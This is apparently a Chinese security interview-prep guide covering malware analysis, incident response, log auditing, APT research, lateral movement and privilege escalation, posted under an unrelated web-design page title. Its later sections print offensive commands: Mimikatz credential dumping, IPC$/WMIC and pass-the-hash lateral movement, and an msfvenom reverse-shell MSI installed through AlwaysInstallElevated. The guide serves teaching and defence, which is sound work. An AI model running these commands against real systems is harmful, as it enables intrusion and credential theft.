当前位置：首页 > news >正文

网站建设系统优势青岛建设英文网站建设

news 2025/10/17 12:28:43

网站建设系统优势,青岛建设英文网站建设,网页设计作业文件夹压缩包,wordpress站点大全安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。目录 1. 样本分析思路（恶意软件逆向） 2. Linux GDB分析样本实战 3. 高级应急案例&#…

安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

1. 样本分析思路（恶意软件逆向）

2. Linux GDB分析样本实战

3. 高级应急案例：WebShell后门集群

4. 日志审计重点

5. 命令被替换的检测方法

6. RPM校验参数

7. APT研究深度

8. 漏洞分析方法论

9. 内网漫游核心路径

10. 横向移动原理

11. 权限提升速查表

1、如何做的样本分析，思路是什么
2、如何用linuxgdb分析一个简单样本
3、再举一个你的其他应急的例子(我举的是挖矿病毒)
4、日志你看的是什么日志，web服务器日志嘛
5、某些命令被替换了，如何发现
6、rpm有个参数就可以校验命令是否被替换，是什么
7、是否做过APT相关的研究
8、如何分析windows，linux，web一些常见的漏洞
9、内网突破到内网漫游的思路
10、如何横向、IPC了解过嘛，横向原理
11、权限提升（windows，linux）
1. 样本分析思路（恶意软件逆向）

四步分析法：
基础静态分析

文件哈希（SHA256/MD5）匹配威胁情报平台（VirusTotal）
字符串提取：strings -n 8 malware.bin | grep -E 'http|/bin/bash|Registry'
节区头检查：readelf -S (Linux) / PEiD查壳 (Windows)
动态行为分析
bash# Linux沙箱监控 strace -f -s 2048 ./malware # 系统调用跟踪 ltrace -f ./malware # 库函数调用 
代码逆向

Windows：IDA Pro分析API调用链（重点监控CreateRemoteThread、RegSetValue）
Linux：GDB调试定位Shellcode（见问题2详解）

网络行为解耦

使用FakeNet-NG模拟网络服务捕获C2通信
解密算法分析：如硬编码密钥（XOR 0x41）、DNS隧道编码
2. Linux GDB分析样本实战

分析篡改ps命令的rootkit：
bash# 1. 附加进程 gdb -p $(pidof malware) # 2. 关键断点设置 (gdb) b *main # 主函数入口 (gdb) b *open@plt # 监控文件操作 (gdb) b *connect # 拦截网络连接 # 3. 反汇编验证恶意行为 (gdb) disas /r malware_function (gdb) x/20i $rip # 检查当前指令 # 4. 寄存器与内存取证 (gdb) info registers # 查看寄存器值 (gdb) x/8wx 0x7fffffffdc50 # 检查栈内存 (gdb) x/s 0x555555556010 # 解析数据段字符串 # 5. 绕过反调试 (gdb) set follow-fork-mode child # 跟踪子进程 (gdb) handle SIGTRAP nopass # 忽略调试陷阱信号 
3. 高级应急案例：WebShell后门集群

场景：某企业服务器被批量植入隐形WebShell
处置流程：
快速遏制
防火墙阻断异常IP：iptables -A INPUT -s 192.168.5.0/24 -j DROP

主机取证
查找变种WebShell：grep -r --include=*.php 'eval($_POST' /var/www
排查定时任务：crontab -l 与 /var/spool/cron/
日志关联
bash# 定位攻击源IP awk '$4 ~ /[15\/Sep\/2025/ && $6 ~ /POST.*\.php/ {print $1}' /var/log/apache/access.log | sort -u 
溯源分析
Webshell通信特征：HTTP请求体含base64_decode(zlib.inflate(...))
关联威胁情报：匹配到APT组织“海莲花”的TTPs
4. 日志审计重点

必查四类日志：

日志类型分析命令/工具关键指标
Web访问日志 goaccess -f access.log HTTP 400/500错误、异常User-Agent
系统认证日志 ausearch -m USER_LOGIN 非办公时间登录、sudo提权记录
进程审计日志 auditd规则监控execve 未知二进制执行路径
网络连接日志 journalctl -u nf_conntrack 隐蔽端口通信（如DNS over TCP）

5. 命令被替换的检测方法

三重验证技巧：
哈希校验
bash# 获取合法命令哈希 rpm -Vf /bin/ps # 重点检查输出中的"5"标记（MD5变化）
时间线分析
bashstat /bin/netstat # 检查修改时间是否异常 find /usr/bin -mtime -1 # 查找24小时内修改的文件 
内存校验
使用busybox静态编译版对比运行结果：
/tmp/busybox ps vs 系统ps
6. RPM校验参数

关键命令：
bashrpm -Va | grep '^..5' # 过滤MD5变化的文件 
输出解析：
S.5....T. c /usr/bin/top

第2个字符"."：无所有者变化
第5个字符"5"：MD5校验失败 → 文件被篡改

7. APT研究深度

实战研究框架：

TTPs映射
提取APT29的钓鱼文档宏代码（TA0001初始访问）

C2基础设施分析
解析Cobalt Strike配置文件（端口跳跃、证书伪造）

漏洞武器化跟踪
关联ProxyLogon（CVE-2021-26855）与APT40攻击活动

防御绕过技术
分析无文件攻击：WMI事件订阅持久化（T1546.003）

8. 漏洞分析方法论

差异化分析框架：

系统类型分析重点工具链
Windows COM对象滥用、ACL配置错误 ProcMon、AccessChk
Linux SUID提权、内核模块漏洞 LinPEAS、checksec.sh
Web 反序列化链、SSTI上下文逃逸 ysoserial、tplmap

案例：
分析WebLogic CVE-2020-2883：
java// 漏洞触发点：T3协议的反序列化器 weblogic.rjvm.InboundMsgAbbrev.readObject() → 调用resolveClass()未校验 
9. 内网漫游核心路径

五步突破法：
mermaidgraph LR A[初始立足点] --> B{信息收集} B --> C[凭证窃取] C --> D[横向移动] D --> E[权限提升] E --> F[域控控制]
关键技术：
信息收集
BloodHound扫描AD拓扑：SharpHound.exe -c All

凭证窃取
Mimikatz提取LSASS内存：sekurlsa::logonpasswords
横向移动
powershell# IPC$利用示例 net use \\DC01\IPC$ /user:domain\user Password123! wmic /node:DC01 process call create "cmd.exe /c whoami"
权限提升
Windows：MS14-068伪造Kerberos票据（goldenPac.py ）
Linux：Dirty Pipe（CVE-2022-0847）覆盖/etc/passwd
10. 横向移动原理

IPC$ 工作机制：
mermaidsequenceDiagram 攻击者->>目标机： 建立IPC$空会话 (net use \\target\IPC$ "") 目标机-->>攻击者： 返回访问令牌 攻击者->>目标机： WMI/SMB命令执行 (wmic /node:target process call create)
防御绕过技巧：

哈希传递（Pass-the-Hash）：
psexec.py -hashes :NTLM_HASH user@target
票据传递（Pass-the-Ticket）：
注入Rubeus获取的TGT票据

11. 权限提升速查表

系统漏洞类型利用工具
Windows 服务路径权限缺陷 accesschk.exe /accepteula
Token滥用 potato家族（JuicyPotato）
Linux SUID滥用 find / -perm -4000 2>/dev/null
内核漏洞 dirtycow.c（CVE-2016-5195）
Cron Job劫持覆盖/etc/cron.d/任务文件

Windows提权案例：
利用AlwaysInstallElevated策略：
cmdreg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f msi > evil.msi msiexec /quiet /qn /i C:\evil.msi 

日志类型	分析命令/工具	关键指标
Web访问日志	`goaccess -f access.log`	HTTP 400/500错误、异常User-Agent
系统认证日志	`ausearch -m USER_LOGIN`	非办公时间登录、sudo提权记录
进程审计日志	`auditd`规则监控`execve`	未知二进制执行路径
网络连接日志	`journalctl -u nf_conntrack`	隐蔽端口通信（如DNS over TCP）

系统类型	分析重点	工具链
Windows	COM对象滥用、ACL配置错误	ProcMon、AccessChk
Linux	SUID提权、内核模块漏洞	LinPEAS、checksec.sh
Web	反序列化链、SSTI上下文逃逸	ysoserial、tplmap

系统	漏洞类型	利用工具
Windows	服务路径权限缺陷	accesschk.exe /accepteula
	Token滥用	potato家族（JuicyPotato）
Linux	SUID滥用	find / -perm -4000 2>/dev/null
	内核漏洞	dirtycow.c（CVE-2016-5195）
	Cron Job劫持	覆盖/etc/cron.d/任务文件